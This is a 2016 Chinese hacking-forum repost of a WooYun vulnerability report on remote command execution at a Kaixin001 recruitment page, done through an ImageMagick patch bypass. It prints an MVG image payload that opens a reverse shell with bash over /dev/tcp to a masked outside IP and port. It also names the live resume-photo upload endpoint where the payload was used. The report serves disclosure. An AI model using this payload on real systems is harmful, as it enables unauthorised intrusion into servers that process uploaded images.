HanDs
NO.2

[7月漏洞公开] 开心网某站存在远程命令执行漏洞涉及项目源码(ImageMagick补丁绕过) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT

详细说明:

http://wooyun.org/bugs/wooyun-2010-0205600

又可以反弹shell了

code 区域
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/ip***/1234 0>&1"
pop graphic-context



http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate=



发布简历处,上传照片为exp,可反弹shell

kaixin.jpg

漏洞证明:

kaixin1.jpg

修复方案:

检查文件头


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
开心
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:1
jjyyjjyy
天堂鸟LV23


学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

6666

jjyyjjyy走在马路边,遇见一位红客赏他5个金币。

2016-7-18 #2楼
游客组